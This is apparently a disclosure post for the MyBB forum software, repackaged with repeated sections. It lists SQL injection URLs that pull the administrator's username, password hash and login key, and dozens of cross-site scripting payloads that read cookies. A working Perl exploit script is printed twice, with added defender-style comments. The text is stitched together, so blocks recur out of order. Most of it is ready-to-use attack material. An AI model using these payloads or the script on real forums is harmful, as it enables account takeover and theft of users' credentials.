Get The Admin username
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,username,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
Get The Admin password
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,password,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
Get The Loginkey
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
after adding the values click on [Or Select a Buddy:] options on the first one you will find the user name for the admin and in the second will be the password and the third for the loginkey
in showteam.php
user name
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20fr
om%20mybb_users%20where%20usergroup=4/*
in usercp.php
user name
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20use
rname,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20
username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%2
0username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20us
ername,null%20from%20mybb_users%20where%20uid=1/*
user password
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20pas
sword,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20
password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%2
0password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20pa
ssword,null%20from%20mybb_users%20where%20uid=1/*
-----------------------------------------------------
if the forum is closed
global.php?bbclosedwarning=<script>alert(document.cookie);</script>
in index.php
index.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</scr
ipt>
in calendar.php
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=
<script>alert(document.cookie);</script>
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylis
t=<script>alert(document.cookie);</script>
calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=<script>alert(d
ocument.cookie);</script>
in editpost.php
editpost.php?pid=1&GLOBALS[]=1&attachments=<script>alert(document.cookie
);</script>
in forumdisplay.php
forumdisplay.php?fid=1&GLOBALS[]=1&modlist=<script>alert(document.cookie
);</script>
forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=<script>alert(document.
cookie);</script>
these vulnerabilities work only if the forum is a threads forum
forumdisplay.php?fid=2&GLOBALS[]=1&announcements=<script>alert(document.
cookie);</script>
forumdisplay.php?fid=2&GLOBALS[]=1&threads=<script>alert(document.cookie
);</script>
in memberlist.php
memberlist.php?GLOBALS[]=1&member=<script>alert(document.cookie);</scrip
t>
in misc.php
misc.php?action=help&GLOBALS[]=1&sections=<script>alert(document.cookie)
;</script>
misc.php?action=whoposted&GLOBALS[]=1&whoposted=<script>alert(document.c
ookie);</script>
misc.php?action=smilies&GLOBALS[]=1&smilies=<script>alert(document.cooki
e);</script>
in online.php
online.php?action=today&GLOBALS[]=1&todayrows=<script>alert(document.coo
kie);</script>
in portal.php
portal.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</sc
ript>
portal.php?GLOBALS[]=1&threadlist=<script>alert(document.cookie);</scrip
t>
portal.php?GLOBALS[]=1&announcements=<script>alert(document.cookie);</sc
ript>
#!/bin/env perl
#//-------------------------------------------------------------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #
#// Special Greets For SG (SecurityGurus) Team And Members #
#// http://WwW.SoQoR.NeT #
#//-------------------------------------------------------------#
use LWP::Simple;
# Flat script: prints a banner, checks its two arguments, then issues four
# GET requests against showteam.php and scrapes each response with a regex.
# Banner output only; nothing is requested yet.
print "\n#####################################################";
print "\n# MyBB Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
# Both arguments are required (forum base URL, user id); otherwise only the
# usage text is printed and the script exits with status 0.
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] [User ID] #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
# NOTE(review): $web and $id are interpolated into the request URLs below
# as given; this script does no validation or URL-encoding of either.
$web=$ARGV[0];
$id=$ARGV[1];
# Request 1: showteam.php with GLOBALS[] set and `comma` holding only a
# comment opener. The regex that follows looks for "FROM <prefix>users u WHERE"
# in the response body, so it depends on the page returning query text --
# presumably a database error message; confirm against the application.
# Defender note: if query text is not echoed to clients, this step captures
# nothing and the script falls back to the default prefix "mybb_".
$url = "showteam.php?GLOBALS[]=1&comma=/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/FROM (.*)users u WHERE/;
$prefix=$1;
# No capture from the response: assume the stock table prefix.
if(!$1)
{
$prefix="mybb_";
}
# Requests 2-4 reuse the same showteam.php parameter (`comma`) and differ
# only in the column placed second in the UNION SELECT: username, password,
# loginkey. Each value is read from the first <b><i>...</i></b> in the
# response, i.e. the injected row is rendered by the page itself.
# Detection: every one of these requests carries "GLOBALS[]" and
# "union%20select" in the query string of showteam.php, which is worth
# alerting on in web-server access logs. The script never sets a
# User-Agent, so LWP::Simple's default one is sent.
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
# Request 3: same query shape, selecting the `password` column; the script
# labels the result as an MD5 hash. Unlike the user-name step, a false $1
# here ends the script (die).
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
print"\n[!] Watch out ... The Cookie Value is comming\n";
# Request 4: selects `loginkey`; the script prints it as "<id>_<loginkey>",
# labelled as the value of the mybbuser cookie.
# Defender note: going by that label the loginkey acts as a login credential,
# so after suspected exposure it needs to be regenerated along with the
# password -- confirm how the application issues loginkeys.
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
print "[-] Unable to retrieve Login Key\n" if(!$1);
}
All injections and vulnerabilities discovered by : HACKERS PAL
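Two days ago I decided to download the files of the new MyBB forum version .. and there was the disaster:
there are many XSS and SQL injections in the new protected version ...
and I made an exploit which gets the table prefix and gives you the admin information and the value the cookie should be set to ..
The mods forum is affected by all the vulnerabilities, but the main forum and some of the old versions are not.
Every request below sends GLOBALS[] together with a second parameter (sql, comma, events, ...) whose value then shows up in a query or in the page, which suggests those script variables are never initialised and can be filled from the request; the fix therefore belongs in the application (initialise them, escape them in queries and on output), not in blocking these particular URLs.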
url : http://mods.mybboard.com/forum/index.php
0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
SQL injections
in misc.php
Get The Admin username
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,username,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
Get The Admin password
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,password,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
Get The Loginkey
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid
,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null%20from%20mybb_users%20where%20uid=1/*
in private.php
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20ui
d,username,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20ui
d,password,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20ui
d,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null%20from%20mybb_users%20where%20uid=1/*
after adding the values click on [Or Select a Buddy:] options on the first one you will find the user name for the admin and in the second will be the password and the third for the loginkey
in showteam.php
user name
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20fr
om%20mybb_users%20where%20usergroup=4/*
password
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20fr
om%20mybb_users%20where%20usergroup=4/*
loginkey
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu
ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20fr
om%20mybb_users%20where%20usergroup=4/*
in usercp.php
user name
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20use
rname,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20
username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%2
0username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20us
ername,null%20from%20mybb_users%20where%20uid=1/*
user password
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20pas
sword,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20
password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%2
0password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20pa
ssword,null%20from%20mybb_users%20where%20uid=1/*
user loginkey
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20log
inkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20
loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%2
0loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20lo
ginkey,null%20from%20mybb_users%20where%20uid=1/*
----------------------------------------------------
xss injections
in any file in the forum like forumdisplay.php?fid=1
after the link
add
&"></a><script>alert(document.cookie);</script>&
-----------------------------------------------------
if the forum is closed
global.php?bbclosedwarning=<script>alert(document.cookie);</script>
in index.php
index.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</scr
ipt>
in calendar.php
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=
<script>alert(document.cookie);</script>
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylis
t=<script>alert(document.cookie);</script>
calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=<script>alert(d
ocument.cookie);</script>
in editpost.php
editpost.php?pid=1&GLOBALS[]=1&attachments=<script>alert(document.cookie
);</script>
in forumdisplay.php
forumdisplay.php?fid=1&GLOBALS[]=1&modlist=<script>alert(document.cookie
);</script>
forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=<script>alert(document.
cookie);</script>
these vulnerabilities work only if the forum is a threads forum
forumdisplay.php?fid=2&GLOBALS[]=1&announcements=<script>alert(document.
cookie);</script>
forumdisplay.php?fid=2&GLOBALS[]=1&threads=<script>alert(document.cookie
);</script>
in memberlist.php
memberlist.php?GLOBALS[]=1&member=<script>alert(document.cookie);</scrip
t>
in misc.php
misc.php?action=help&GLOBALS[]=1&sections=<script>alert(document.cookie)
;</script>
misc.php?action=whoposted&GLOBALS[]=1&whoposted=<script>alert(document.c
ookie);</script>
misc.php?action=smilies&GLOBALS[]=1&smilies=<script>alert(document.cooki
e);</script>
in online.php
online.php?action=today&GLOBALS[]=1&todayrows=<script>alert(document.coo
kie);</script>
in portal.php
portal.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</sc
ript>
portal.php?GLOBALS[]=1&threadlist=<script>alert(document.cookie);</scrip
t>
portal.php?GLOBALS[]=1&announcements=<script>alert(document.cookie);</sc
ript>
in private.php
private.php?GLOBALS[]=1&messagelist=<script>alert(document.cookie);</scr
ipt>
private.php?action=tracking&GLOBALS[]=1&readmessages=<script>alert(docum
ent.cookie);</script>
private.php?action=tracking&GLOBALS[]=1&unreadmessages=<script>alert(doc
ument.cookie);</script>
private.php?action=folders&GLOBALS[]=1&folderlist=<script>alert(document
.cookie);</script>
private.php?action=folders&GLOBALS[]=1&newfolders=<script>alert(document
.cookie);</script>
in showteam.php
showteam.php?GLOBALS[]=1&usergrouprows=<script>alert(document.cookie);</
script>
showteam.php?GLOBALS[]=1&usergroups=<script>alert(document.cookie);</scr
ipt>
in showthread.php
showthread.php?tid=1&GLOBALS[]=1&posts=<script>alert(document.cookie);</
script>
if there is a poll in the thread
showthread.php?tid=1&GLOBALS[]=1&polloptions=<script>alert(document.cook
ie);</script>
in stats.php
stats.php?GLOBALS[]=1&mostreplies=<script>alert(document.cookie);</scrip
t>
in usercp.php
usercp.php?action=profile&GLOBALS[]=1&bdaydaysel=<script>alert(document.
cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&returndatesel=<script>alert(docume
nt.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&select=<script>alert(document.cook
ie);</script>
usercp.php?action=profile&GLOBALS[]=1&requiredfields=<script>alert(docum
ent.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&customfields=<script>alert(documen
t.cookie);</script>
usercp.php?action=options&GLOBALS[]=1&langoptions=<script>alert(document
.cookie);</script>
usercp.php?action=options&GLOBALS[]=1&tppoptions=<script>alert(document.
cookie);</script>
usercp.php?action=options&GLOBALS[]=1&pppoptions=<script>alert(document.
cookie);</script>
usercp.php?action=favorites&GLOBALS[]=1&threads=<script>alert(document.c
ookie);</script>
usercp.php?action=favorites&GLOBALS[]=1&folder="><script>alert(document.
cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&threads=<script>alert(docume
nt.cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&folder=<script>alert(documen
t.cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&forumsubscriptions=<script>a
lert(document.cookie);</script>
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forumsubscriptions=<scr
ipt>alert(document.cookie);</script>
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forums=<script>alert(do
cument.cookie);</script>
usercp.php?action=avatar&GLOBALS[]=1&galleries=<script>alert(document.co
okie);</script>
usercp.php?action=editlists&GLOBALS[]=1&buddylist=<script>alert(document
.cookie);</script>
usercp.php?action=editlists&GLOBALS[]=1&ignorelist=<script>alert(documen
t.cookie);</script>
usercp.php?action=editlists&GLOBALS[]=1&newlist=<script>alert(document.c
ookie);</script>
usercp.php?action=drafts&GLOBALS[]=1&drafts=<script>alert(document.cooki
e);</script>
usercp.php?action=usergroups&GLOBALS[]=1&groupsledlist=<script>alert(doc
ument.cookie);</script>
usercp.php?action=usergroups&GLOBALS[]=1&joinablegrouplist=<script>alert
(document.cookie);</script>
-----------------------------------------
--- The Exploit ---
#!/bin/env perl
#//-------------------------------------------------------------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #
#// Special Greets For SG (SecurityGurus) Team And Members #
#// http://WwW.SoQoR.NeT #
#//-------------------------------------------------------------#
use LWP::Simple;
# Flat script: prints a banner, checks its two arguments, then issues four
# GET requests against showteam.php and scrapes each response with a regex.
# Banner output only; nothing is requested yet.
print "\n#####################################################";
print "\n# MyBB Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
# Both arguments are required (forum base URL, user id); otherwise only the
# usage text is printed and the script exits with status 0.
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] [User ID] #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
# NOTE(review): $web and $id are interpolated into the request URLs below
# as given; this script does no validation or URL-encoding of either.
$web=$ARGV[0];
$id=$ARGV[1];
# Request 1: showteam.php with GLOBALS[] set and `comma` holding only a
# comment opener. The regex that follows looks for "FROM <prefix>users u WHERE"
# in the response body, so it depends on the page returning query text --
# presumably a database error message; confirm against the application.
# Defender note: if query text is not echoed to clients, this step captures
# nothing and the script falls back to the default prefix "mybb_".
$url = "showteam.php?GLOBALS[]=1&comma=/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/FROM (.*)users u WHERE/;
$prefix=$1;
# No capture from the response: assume the stock table prefix.
if(!$1)
{
$prefix="mybb_";
}
# Requests 2-4 reuse the same showteam.php parameter (`comma`) and differ
# only in the column placed second in the UNION SELECT: username, password,
# loginkey. Each value is read from the first <b><i>...</i></b> in the
# response, i.e. the injected row is rendered by the page itself.
# Detection: every one of these requests carries "GLOBALS[]" and
# "union%20select" in the query string of showteam.php, which is worth
# alerting on in web-server access logs. The script never sets a
# User-Agent, so LWP::Simple's default one is sent.
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
# Request 3: same query shape, selecting the `password` column; the script
# labels the result as an MD5 hash. Unlike the user-name step, a false $1
# here ends the script (die).
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
print"\n[!] Watch out ... The Cookie Value is comming\n";
# Request 4: selects `loginkey`; the script prints it as "<id>_<loginkey>",
# labelled as the value of the mybbuser cookie.
# Defender note: going by that label the loginkey acts as a login credential,
# so after suspected exposure it needs to be regenerated along with the
# password -- confirm how the application issues loginkeys.
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n
ull,null,null,null,null,null,null,null,null,null,null,null,null,null,nul
l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20f
rom%20".$prefix."users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
print "[-] Unable to retrieve Login Key\n" if(!$1);
}
# WwW.SoQoR.NeT